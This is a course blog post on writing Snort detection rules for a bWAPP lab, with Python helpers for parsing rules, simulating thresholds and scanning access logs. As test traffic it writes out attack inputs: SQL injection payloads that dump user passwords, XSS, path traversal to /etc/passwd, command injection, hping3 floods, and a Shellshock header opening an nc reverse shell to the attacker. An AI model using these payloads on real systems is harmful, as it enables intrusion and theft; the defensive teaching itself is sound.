MegaIT Academy National Key Industry Course / Java and Web Security

[1-12] Configuring an IDS (Snort) for the bWAPP Environment

한님폐하 2022. 9. 13. 10:43

1. Attacker network configuration

Edit /etc/network/interfaces so that the attacker has one interface on the 192.168.2.0/24 side (eth0) and one on the 192.168.20.0/24 side (eth1). The gateway line of eth1 stays commented out; instead, a static route sends traffic for 192.168.20.0/24 through 192.168.2.100. The `up` line belongs to the eth1 stanza above it.

vi /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback
auto eth0 eth1
iface eth0 inet static
	address 192.168.2.50
	network 192.168.2.0
	netmask 255.255.255.0
	gateway 192.168.2.254
	broadcast 192.168.2.255
iface eth1 inet static
	address 192.168.20.50
	network 192.168.20.0
	netmask 255.255.255.0
	#gateway 192.168.20.100
	broadcast 192.168.20.255
	up route add -net 192.168.20.0 netmask 255.255.255.0 gw 192.168.2.100
service networking restart

2. Installing the telnet daemon on bWAPP

apt-get install telnetd

3. Snort

3-0. Installing and enabling Snort

apt-get -y install snort snort-common snort-common-libraries snort-doc snort-rules-default
dpkg -l | grep snort
vi /etc/snort/snort.conf
ipvar HOME_NET 192.168.20.0/24
update-rc.d snort enable
service snort start
service snort status

HOME_NET must be the network Snort protects (here the bWAPP segment, 192.168.20.0/24). Every rule below that uses $HOME_NET or $EXTERNAL_NET depends on this one line, so check it first when a rule never fires.

3-1. Snort rule directory

  • The rule files shipped with Snort are installed under '/etc/snort/rules'.
  • IDS/IPS vendors and the snort.org site provide rule sets. It is recommended to keep rules in use even when they are 12 months old or more, rather than running only the newest set.
  • If you write and operate your own rules, add them to the 'local.rules' file rather than editing the vendor files, so that rule-set updates do not overwrite them.
cat /etc/snort/rules/local.rules

3-2. Snort rule structure

A rule is a rule header followed by options in parentheses:

Rule header                                               Options
Action Protocol SrcIP SrcPort -> DstIP DstPort            (Option; Option; ...)
alert tcp 192.168.2.0/24 any -> 192.168.20.200/32 80 (msg:"SQL Injection"; content:"union"; nocase; sid:3000001; rev:1;)

  • Action types
alert    raise an alert and log the packet
log      log the packet only
pass     ignore the packet
drop     block the packet and log it
reject   block the packet, log it, and send a response (TCP: TCP RST; UDP: ICMP port unreachable)
sdrop    block the packet without logging it

[Note] IDS vs. IPS

  • For an IDS deployment, set the action to 'alert'.
  • For an IPS deployment, set the action to 'drop' or 'reject'. The sensor must then be connected inline (traffic passes through it); on a mirror/span port there is nothing for drop or reject to block.

  • Protocol types
tcp     TCP
udp     UDP
ip      any IP protocol (catch-all)
icmp    ICMP messages
(Snort 2 accepts only tcp, udp, icmp and ip in this field; 'any' is not a valid protocol keyword. Use ip to match every protocol.)

  • SrcIP/DstIP formats
192.168.20.50/32                         a single host, 192.168.20.50
192.168.20.0/24                          the 192.168.20.0/24 subnet
[192.168.20.0/24, 172.20.0.0/16]         a list: 192.168.20.0/24 and 172.20.0.0/16
[192.168.20.204/32, 192.168.20.205/32]   a list of hosts: 192.168.20.204 and 192.168.20.205
!192.168.20.0/24                         everything except 192.168.20.0/24
$HOME_NET                                variable holding the internal (protected) network range
$EXTERNAL_NET                            variable holding the external network range
$XXX_SERVERS                             variable holding the addresses of a specific server group (e.g. $HTTP_SERVERS)

  • SrcPort/DstPort
80       port 80
1:500    ports 1 to 500
!80      every port except 80
!1:500   every port except 1 to 500
any      all ports

  • Direction
->   the left side is the source and the right side the destination: match packets going from left to right
<>   bidirectional: match packets in either direction

  • General options
;           option separator                                                                 sid:3000001; rev:1;
msg         alert event message                                                              msg:"ICMP Ping test";
sid         rule identifier; 100 to 999,999 are reserved for rules distributed by snort.org,  sid:3000001;
            local rules use 1,000,000 and above (this page uses 3,000,000 and up)
rev         rule revision, incremented by 1 each time the rule is modified                   rev:1;
priority    severity of the rule; a lower number is a higher priority, 1 is the highest      priority:1;
            (the built-in classifications use 1 to 4)
classtype   Snort rule classification                                                        classtype:class-name;
reference   reference to an advisory or URL describing the vulnerability                     reference:url,http://...;

  • Flow options
to_server or from_client     match only packets sent from the client to the server
to_client or from_server     match only packets sent from the server to the client
established                  match only packets that belong to an established session
stateless                    match regardless of session state
flow:to_server,established   established session AND client-to-server: the usual setting for rules on web requests

  • Payload detection options
content    match text or bytes             content:"xxx"; or content:"|hex hex|"; (bytes between pipes are written in hex)
nocase     case-insensitive content match  content:"xxx"; nocase;
flags      TCP flags                       flags:SA; or flags:FPU;
dsize      payload size                    dsize:1000<>1500; or dsize:0;
itype      ICMP type                       itype:8; (echo request) or itype:0; (echo reply)

  • HTTP detection options
http_method         match against the HTTP method at the start of the request
http_uri            match against the (normalized) request URI
http_cookie         match against the HTTP Cookie header
http_header         match against the HTTP request/response headers
http_client_body    match against the HTTP request body (client to server only; there is no response body here)
http_stat_code      match against the HTTP response status code
http_stat_message   match against the HTTP response status message

[Reference] HTTP response codes and messages: "HTTP 상태 코드 정리" on the WhaTap blog (www.whatap.io), a list of HTTP response status codes and how the server answers client requests.
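The header and option syntax described in this section, as an added worked example that is not part of the original post: a small Python parser (my own code, not Snort's) that splits a rule into its header fields and options, honours the '\;' escape used inside msg strings later on this page, turns a content value with |hex| sections into the bytes Snort actually searches for, and checks a local.rules file for missing, reserved or duplicate sids. The rule strings in it are taken from this page; the function names are my own.

```python
import re

# Rule header: action proto src sport direction dst dport, then the option body in ( ).
HEADER_RE = re.compile(
    r"^(?P<action>alert|log|pass|drop|reject|sdrop)\s+"
    r"(?P<proto>tcp|udp|icmp|ip)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*"
    r"\((?P<opts>.*)\)\s*$"
)


def split_options(body):
    """Split the option body on ';', honouring backslash escapes and double-quoted values."""
    opts, cur, quoted, i = [], [], False, 0
    while i < len(body):
        c = body[i]
        if c == "\\" and i + 1 < len(body):   # escaped character: keep it literally
            cur.append(body[i + 1])
            i += 2
            continue
        if c == '"':
            quoted = not quoted
        if c == ";" and not quoted:            # an unquoted ';' ends an option
            tok = "".join(cur).strip()
            if tok:
                opts.append(tok)
            cur = []
        else:
            cur.append(c)
        i += 1
    tok = "".join(cur).strip()
    if tok:
        opts.append(tok)
    return opts


def parse_option(tok):
    """'msg:"x"' -> ('msg', 'x'); a bare modifier such as 'nocase' -> ('nocase', None)."""
    if ":" not in tok:
        return tok, None
    key, value = tok.split(":", 1)
    value = value.strip()
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return key.strip(), value


def parse_rule(line):
    """Return the header fields plus an ordered list of (keyword, value) options."""
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError("not a Snort rule: " + line)
    rule = m.groupdict()
    rule["options"] = [parse_option(t) for t in split_options(rule.pop("opts"))]
    return rule


def option(rule, key):
    """First value of option `key`, or None if the rule does not use it."""
    for k, v in rule["options"]:
        if k == key:
            return v
    return None


def content_bytes(value):
    """Turn a content value with |hex| sections into the bytes Snort searches for."""
    out = bytearray()
    for i, part in enumerate(value.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def check_local_rules(lines):
    """Problems a hand-written local.rules often has: missing, reserved or duplicate sids."""
    problems, seen = [], {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        rule = parse_rule(line)
        sid = option(rule, "sid")
        if sid is None:
            problems.append("missing sid: %s" % option(rule, "msg"))
            continue
        sid = int(sid)
        if sid < 1000000:                     # 100-999,999 belong to snort.org rule sets
            problems.append("sid %d is in the range reserved for snort.org rules" % sid)
        if sid in seen:
            problems.append("duplicate sid %d: %r and %r" % (sid, seen[sid], option(rule, "msg")))
        seen[sid] = option(rule, "msg")
    return problems


if __name__ == "__main__":
    rule = parse_rule('alert tcp 192.168.2.0/24 any -> 192.168.20.200/32 80 '
                      '(msg:"SQL Injection"; content:"union"; nocase; sid:3000001; rev:1;)')
    print(" ".join(rule[k] for k in ("action", "proto", "src", "sport", "dir", "dst", "dport")))
    for key, value in rule["options"]:
        print("  %-8s %s" % (key, "" if value is None else value))
    print(content_bytes("|28 29 20 7b|"))
```

Run it against the whole of /etc/snort/rules/local.rules (`check_local_rules(open(path))`) before `service snort restart`: a duplicate sid is the most common reason Snort refuses to start after editing the file.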

 

3-3. Snort rule configuration

3-3-1. Basic detection rules

vi /etc/snort/rules/local.rules
# ICMP
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"## ICMP Echo ##"; itype:8; sid:3000001; rev:1;)
alert icmp $HOME_NET any -> $EXTERNAL_NET any (msg:"## ICMP Echo-Reply ##"; itype:0; sid:3000002; rev:1;)
# FTP
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"## FTP Request ##"; content:"USER"; sid:3000003; rev:1;)
alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:"## FTP Response ##"; content:"ProFTPD"; sid:3000004; rev:1;)
# TELNET
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:"## Telnet Request ##"; sid:3000005; rev:1;)
alert tcp $HOME_NET 23 -> $EXTERNAL_NET any (msg:"## Telnet Response ##"; content:"login"; sid:3000006; rev:1;)
# Web
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"## HTTP Request ##"; sid:3000007; rev:1;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"## HTTP Response ##"; sid:3000008; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

The restart makes Snort reload local.rules (a rule with a syntax error shows up here as a failed start). The daemon is then stopped and Snort is run in the foreground instead: -A console prints alerts to the terminal, -b logs the matching packets in tcpdump (pcap) format, -q suppresses the banner and statistics, and -c points at the configuration file.

The Telnet Request and HTTP Request rules have no content match, so they fire on every packet to port 23 or 80, including the TCP handshake. They are there to confirm that traffic reaches the sensor, not as production rules.

  • Test from the attacker or the gateway as follows.
ping -c 5 [target IP]
telnet [target IP]
firefox http://[target IP] &
ftp [target IP]

3-3-2. Detecting NMAP scans

vi /etc/snort/rules/local.rules
# NMAP Scan
alert tcp any any -> $HOME_NET any (msg:"## NMAP Half Open-SCAN ##"; flags:S,12; flow:to_server,not_established; sid:3000009; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP FIN-SCAN ##"; flags:F,12; flow:not_established; sid:3000010; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP XMAS-SCAN ##"; flags:FPU; sid:3000011; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP NULL-SCAN ##"; flags:0,12; sid:3000012; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

flags:S,12 matches a segment with only SYN set while ignoring the two reserved (ECN) bits, which some stacks set on an initial SYN; flags:F,12 does the same for a bare FIN; flags:FPU matches FIN+PSH+URG (XMAS scan); flags:0 matches a segment with no flags at all (NULL scan). The half-open rule also fires for every legitimate connection attempt, since a normal connection starts with a bare SYN too, so on its own it identifies a scan only through volume; the threshold keywords in the note below are the usual way to turn that volume into a single alert.

  • Test from the attacker or the gateway as follows.
nmap -sS -p 21 [target IP]
nmap -sF -p 21 [target IP]
nmap -sX -p 21 [target IP]
nmap -sN -p 21 [target IP]

[Note] threshold, track, count, seconds

threshold:type threshold   act on every c-th event within an s-second window
threshold:type both        act once per s-second window, when the c-th event arrives
threshold:type limit       act on the first c events in each s-second window and suppress the rest
track by_src               count events per source IP (1:N, one attacker against many targets)
track by_dst               count events per destination IP (N:1, many sources against one target)
count                      number of events (c)
seconds                    window length in seconds (s)
(flags:S; threshold:type threshold, track by_dst, count 100, seconds 1;)

With the option above, a SYN flood produces one alert for every 100 SYNs per second sent to the same destination; 'limit' with the same values would produce at most 100 alerts per second per destination, and 'both' at most one.
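To make the three threshold types concrete, here is an added Python simulation (not part of the original post, and not Snort's code) that replays a list of (time, source, destination) events through the threshold logic as the Snort 2 manual describes it and returns which events would still alert. The burst generator models the hping3 --fast test used in the next section (10 packets per second). The exact window handling (the window starts at the first counted event for an address, and the counter restarts after a 'threshold' alert) is my reading of Snort's behaviour and is marked as an assumption in the code.

```python
def apply_threshold(events, ttype, track, count, seconds):
    """Replay (time, src, dst) events through a Snort-style threshold and return the
    indices of the events that still raise an alert.

    limit      -> alert on the first `count` events per window, suppress the rest
    threshold  -> alert on every `count`-th event (the counter restarts after an alert)
    both       -> alert once per window, when the `count`-th event arrives
    Assumption: a window of `seconds` starts at the first counted event for the tracked
    address and the counter is reset when it expires, as in Snort's sfthreshold code.
    """
    if ttype not in ("limit", "threshold", "both"):
        raise ValueError("type must be limit, threshold or both")
    if track not in ("by_src", "by_dst"):
        raise ValueError("track must be by_src or by_dst")
    state = {}          # tracked address -> (window_start, events counted in the window)
    alerts = []
    for idx, (t, src, dst) in enumerate(events):
        key = src if track == "by_src" else dst
        start, n = state.get(key, (t, 0))
        if t - start >= seconds:        # window expired: open a new one
            start, n = t, 0
        n += 1
        fire = False
        if ttype == "limit":
            fire = n <= count
        elif ttype == "threshold":
            if n >= count:
                fire = True
                start, n = t, 0         # restart counting after the alert
        else:                           # both
            fire = n == count
        state[key] = (start, n)
        if fire:
            alerts.append(idx)
    return alerts


def icmp_burst(src, dst, packets, pps, t0=0.0):
    """Constructed sample: `packets` echo requests from src to dst at `pps` per second,
    the shape of traffic produced by 'hping3 --icmp --fast' (10 packets per second)."""
    return [(t0 + i / pps, src, dst) for i in range(packets)]


def interleave(*bursts):
    """Merge several bursts into one time-ordered event list (for track by_dst tests)."""
    return sorted((e for b in bursts for e in b), key=lambda e: e[0])


if __name__ == "__main__":
    burst = icmp_burst("192.168.2.50", "192.168.20.205", packets=20, pps=10)
    for ttype in ("threshold", "limit", "both"):
        print("%-9s track by_src, count 5, seconds 1 ->" % ttype,
              apply_threshold(burst, ttype, "by_src", count=5, seconds=1))
```

Two seconds of hping3 --fast (20 packets) give four alerts with 'threshold', ten with 'limit' and two with 'both'; this is the difference you will see on the console between the ICMP Flooding-threshold and ICMP Flooding-limit rules in the next section. Three packets each from two sources never reach count 5 with track by_src but do with track by_dst, which is why the SYN-flood rule tracks the destination.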

 

3-3-3. Detecting DoS and DDoS attacks

vi /etc/snort/rules/local.rules
# DoS && DDoS
alert icmp any any -> $HOME_NET any (msg:"## ICMP Flooding-threshold Attack ##"; itype:8; icode:0; threshold:type threshold, track by_src, count 5, seconds 1; sid:3000013; rev:1;)
alert icmp any any -> $HOME_NET any (msg:"## ICMP Flooding-limit Attack ##"; itype:8; icode:0; threshold:type limit, track by_src, count 5, seconds 1; sid:3000014; rev:1;)
alert icmp any any -> $HOME_NET any (msg:"## Ping of Death Attack ##"; itype:8; icode:0; content:"|5858585858585858|"; threshold:type limit, track by_dst, count 5, seconds 1; sid:3000015; rev:1;)
alert ip any any -> $HOME_NET any (msg:"## Land Attack ##"; sameip; sid:3000016; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## TCP Syn Flooding Attack ##"; flow:stateless; flags:S,12; threshold:type limit, track by_dst, count 5, seconds 1; sid:3000017; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

The Ping of Death rule matches the byte string |58 58 58 58 58 58 58 58| ("XXXXXXXX"): hping3 pads packet data with 'X' characters, so the content match ties the alert to the hping3 test below rather than to oversized ICMP packets in general. The Land attack rule uses sameip, which matches packets whose source and destination address are identical.

  • Test from the attacker or the gateway as follows (-I selects the interface, --fast sends 10 packets per second, -d sets the data size, --spoof sets the source address).
hping3 -I eth0 --icmp [target IP] --fast
hping3 -I eth0 --icmp [target IP] --fast -d 50000
hping3 -I eth0 --icmp [target IP] --spoof [target IP] --fast
hping3 -I eth0 --syn [target IP] -p 80 --fast

3-3-4. Detecting web server attacks

vi /etc/snort/rules/local.rules
# Web Attack
alert tcp any any -> $HOME_NET 80 (msg:"## Web Attack ##"; content:"GET /cmd.exe"; nocase; sid:3000018; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

  • Test from the attacker or the gateway as follows. wafw00f sends a series of probe requests, some of them carrying attack-like strings, to fingerprint a web application firewall in front of the site.
wafw00f http://192.168.20.205

3-3-5. Detecting OS command injection

vi /etc/snort/rules/local.rules
# OS Command Injection
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \;"; flow:to_server,established; content:"%3b"; nocase; http_uri; sid:3000019; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \/"; flow:to_server,established; content:"%2f"; nocase; http_uri; sid:3000020; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \&&"; flow:to_server,established; content:"%26%26"; nocase; http_uri; sid:3000021; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \;"; flow:to_server,established; content:"%3b"; nocase; http_client_body; sid:3000022; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \/"; flow:to_server,established; content:"%2f"; nocase; http_client_body; sid:3000023; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \&&"; flow:to_server,established; content:"%26%26"; nocase; http_client_body; sid:3000024; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

These rules look for the URL-encoded forms of ';' (%3b), '/' (%2f) and '&&' (%26%26), which is how a browser submits them from a form. Two caveats: http_uri inspects the normalized URI buffer, where the HTTP preprocessor has already decoded percent-encoding with its default settings, so an encoded ';' in a GET request is seen there as a plain ';' (match the decoded character, or use http_raw_uri to match the wire form); and matching on '%2f' alone fires on every encoded slash, so expect noise from any application that passes paths in parameters. The bWAPP scenario below submits a POST form, so it is the http_client_body rules that fire in this test.

  • From the attacker or the gateway, open the bWAPP 'OS Command Injection' scenario and test as follows.
DNS lookup: www.google.com ; cat /etc/passwd | head -3

3-3-6. Detecting SQL injection

vi /etc/snort/rules/local.rules
# SQL Injection
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI AND"; flow:established,to_server; content:"AND"; nocase; http_uri; sid:3000025; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI OR"; flow:established,to_server; content:"OR"; nocase; http_uri; sid:3000026; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI UNION"; flow:established,to_server; content:"UNION"; nocase; http_uri; sid:3000027; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI SELECT"; flow:established,to_server; content:"SELECT"; nocase; http_uri; sid:3000028; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body AND"; flow:established,to_server; content:"AND"; nocase; http_client_body; sid:3000029; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body OR"; flow:established,to_server; content:"OR"; nocase; http_client_body; sid:3000030; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body UNION"; flow:established,to_server; content:"UNION"; nocase; http_client_body; sid:3000031; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body SELECT"; flow:established,to_server; content:"SELECT"; nocase; http_client_body; sid:3000032; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

Matching bare keywords such as OR and AND in a URI is deliberately crude: any path or parameter that happens to contain those letters ('portal', 'form', 'directory') fires the rule too. In a real deployment these rules would be tightened with additional content matches or pcre, and limited to $HTTP_SERVERS and $HTTP_PORTS instead of $HOME_NET any.

  • From the attacker or the gateway, open the bWAPP 'SQL Injection (GET/Search)' scenario and enter the following in the search field, one at a time.
1' or 1=1 #
1' and 1=1 #
0' union select all 1,2,3,4,5,6,7 #
0' union select all 1,database(),user(),system_user(),version(),6,7 #
0' union select all 1,table_schema,table_name,4,5,6,7 from information_schema.tables #
0' union select all 1,table_schema,table_name,4,5,6,7 from information_schema.tables limit 17,5 #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns where table_name='users' #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns where table_name='users' and table_schema='bwapp' #
0' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' and table_schema='bwapp' #
0' union select all 1,concat(id,login),password,email,secret,6,7 from users #

3-3-7. Detecting XSS injection

vi /etc/snort/rules/local.rules
# XSS Injection
alert tcp any any -> $HOME_NET any (msg:"XSS Injection URI"; flow:established,to_server; content:"</script>"; nocase; http_uri; sid:3000033; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"XSS Injection Body"; flow:established,to_server; content:"%3C%2Fscript%3E"; nocase; http_client_body; sid:3000034; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

The URI rule matches the literal '</script>' because the http_uri buffer is normalized (percent-decoded), whereas the body rule matches the URL-encoded form '%3C%2Fscript%3E' exactly as the browser submits it in a POST form. Both look only for a closing script tag, so a payload that uses an event handler attribute or a tag without a closing </script> is not caught by them.

  • From the attacker or the gateway, open the bWAPP 'XSS - Reflected (POST)' scenario and test as follows.
<script>alert("test")</script>
<script>alert(document.cookie)</script>

3-3-8. Detecting path traversal

vi /etc/snort/rules/local.rules
# Path Traversal
alert tcp any any -> $HOME_NET any (msg:"Path Traversal URI \../"; content:"../"; nocase; http_uri; sid:3000035; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal URI \/etc"; content:"/etc"; nocase; http_uri; sid:3000036; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal Body \../"; content:"../"; nocase; http_client_body; sid:3000037; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal Body \/etc"; content:"/etc"; nocase; http_client_body; sid:3000038; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

  • From the attacker, open the bWAPP 'Directory Traversal - Directories' scenario and test as follows.
http://192.168.20.205/bWAPP/directory_traversal_2.php?directory=../../../etc
http://192.168.20.205/bWAPP/directory_traversal_2.php?directory=/etc

  • From the attacker, open the 'Directory Traversal - Files' scenario and test as follows.
http://192.168.20.205/bWAPP/directory_traversal_1.php?page=../../../etc/passwd
http://192.168.20.205/bWAPP/directory_traversal_1.php?page=/etc/passwd

3-3-9. Detecting iframe HTML injection

vi /etc/snort/rules/local.rules
# iframe HTML
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection URI"; content:"<iframe"; nocase; http_uri; sid:3000039; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection Body-1"; content:"<iframe"; nocase; http_client_body; sid:3000040; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection Body-2"; content:"%3ciframe"; nocase; http_client_body; sid:3000041; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

The two body rules cover both the raw and the URL-encoded form of the tag; nocase makes '%3ciframe' also match '%3Ciframe'.

  • From the attacker, open the bWAPP 'iFrame Injection' scenario and test as follows.
http://[target IP]/bWAPP/iframei.php?ParamUrl=robots.txt" height="0" width="0"></iframe><iframe frameborder="0" src=http://www.orak-1004.com height="800" width="800"></iframe><iframe>&ParamWidth=250&ParamHeight=250

3-3-10. Detecting Bash Shellshock

vi /etc/snort/rules/local.rules
# Bash Shellshock
alert tcp any any -> $HOME_NET any (msg:"Bash Shellshock-1"; flow:established,to_server; content:"|28 29 20 7b|"; http_header; sid:3000042; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Bash Shellshock-2"; flow:established,to_server; content:"() {"; http_header; sid:3000043; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

The two rules are equivalent: |28 29 20 7b| is the hex form of the four bytes "() {", the start of the function definition that a Shellshock payload places in an HTTP header, which the CGI handler then exports into the environment of the bash process that runs the script. Writing a pattern in hex is the usual way to express content that contains characters which would otherwise need escaping.

[Reference] ASCII

28  (
29  )
20  space
7b  {

  • From the attacker, open the bWAPP 'Shellshock Vulnerability (CGI)' scenario and test as follows.
  • Using Burp Suite, intercept the request for the '/bWAPP/cgi-bin/shellshock.sh' page and inject the Bash Shellshock code into it.
GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.20.205
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.205/bWAPP/shellshock.php
Cookie: security_level=0; PHPSESSID=4cd4e9d0cab55e06b426a893d532706f
Connection: close
Upgrade-Insecure-Requests: 1

  • Change the Referer: header above as follows and turn intercept off. The injected command connects back with nc to port 4444 on the attacker, so a listener must already be waiting on that port before the request is forwarded.
Referer: () { :;}; echo "Shellshock Vulnerability TEST" $(/bin/sh -c "nc -e /bin/bash [attacker IP] 4444")

3-4. Web server log analysis

  • On bWAPP, delete the web server log file and restart the web service as shown below, so that the log contains only the test traffic.
  • Using 'notepad++', analyse 'access.log' and the Snort event log and determine the following:
    ① attack type
    ② attack pattern
    ③ attack date/time
    ④ address of the attacking system
    ⑤ whether the Snort rule detected it
sudo /etc/init.d/apache2 restart
cat /var/log/apache2/access.log

Note that access.log records only the request line, Referer and User-Agent (combined format). Attacks carried in a POST body (the OS command injection and XSS POST tests above) therefore do not appear in it and must be checked against the Snort event log or the pcap written by the -b option.
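For step 3-4, here is an added Python script (not part of the original post) that does the access.log side of the analysis automatically: it parses Apache combined-format lines, URL-decodes the request URI the way Snort's http_uri buffer is normalized, and applies the same URI and header strings that the local.rules on this page look for, returning attack type, pattern (sid and msg), date/time and source address for every hit. The log lines are constructed samples in the shape of bWAPP's access.log; the paths sqli_1.php, xss_get.php and portal.php are assumed bWAPP pages not named elsewhere on this page. Running it also shows why the bare OR keyword rule is noisy: the benign portal.php request and the words 'directory' and 'form' in other URIs all trigger it.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:\\.|[^"\\])*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:\\.|[^"\\])*)" "(?P<agent>(?:\\.|[^"\\])*)"'
)

# (sid, message, buffer, pattern): the strings the local.rules above search for.
# 'uri' patterns are compared with the decoded URI, as Snort's http_uri does with the
# normalized URI; 'header' patterns with Referer and User-Agent (what http_header sees).
SIGNATURES = [
    (3000026, "SQL Injection URI OR", "uri", "or"),
    (3000027, "SQL Injection URI UNION", "uri", "union"),
    (3000028, "SQL Injection URI SELECT", "uri", "select"),
    (3000033, "XSS Injection URI", "uri", "</script>"),
    (3000035, "Path Traversal URI ../", "uri", "../"),
    (3000036, "Path Traversal URI /etc", "uri", "/etc"),
    (3000043, "Bash Shellshock", "header", "() {"),
]


def parse_line(line):
    """One combined-format line -> dict, or None if the line is not in that format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    rec["uri"] = unquote_plus(parts[1]) if len(parts) > 1 else ""   # decode %xx and '+'
    return rec


def analyze(lines):
    """Return (line_no, time, src, sid, msg) for every signature hit, in log order."""
    hits = []
    for no, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        buffers = {
            "uri": rec["uri"].lower(),
            "header": (rec["referer"] + "\n" + rec["agent"]).lower(),
        }
        for sid, msg, buf, pattern in SIGNATURES:
            if pattern in buffers[buf]:        # content + nocase
                hits.append((no, rec["time"], rec["src"], sid, msg))
    return hits


# Constructed sample lines in the shape of /var/log/apache2/access.log on bWAPP. The
# fourth is a benign page view; the last carries a Shellshock string in the Referer.
SAMPLE_LOG = [
    '192.168.2.50 - - [13/Sep/2022:10:43:01 +0900] "GET /bWAPP/directory_traversal_1.php?page=../../../etc/passwd HTTP/1.1" 200 1523 "http://192.168.20.205/bWAPP/directory_traversal_1.php" "Mozilla/5.0"',
    '192.168.2.50 - - [13/Sep/2022:10:43:07 +0900] "GET /bWAPP/sqli_1.php?title=0%27+union+select+all+1%2C2%2C3%2C4%2C5%2C6%2C7+%23&action=search HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '192.168.2.50 - - [13/Sep/2022:10:43:12 +0900] "GET /bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=x&form=submit HTTP/1.1" 200 1802 "-" "Mozilla/5.0"',
    '192.168.2.50 - - [13/Sep/2022:10:43:15 +0900] "GET /bWAPP/portal.php HTTP/1.1" 200 8899 "-" "Mozilla/5.0"',
    '192.168.2.50 - - [13/Sep/2022:10:43:20 +0900] "GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1" 200 113 "() { :;}; echo Shellshock Vulnerability TEST" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, when, src, sid, msg in analyze(SAMPLE_LOG):
        print("line %d  %s  %s  sid:%d  %s" % (no, when, src, sid, msg))
```

To use it on the real file, replace SAMPLE_LOG with `open("/var/log/apache2/access.log")`. Each hit gives items ① to ④ of the exercise directly; item ⑤ is answered by looking the sid up in the Snort console output for the same timestamp. POST bodies are not logged, so the OS command injection and XSS POST tests can only be confirmed from the Snort side.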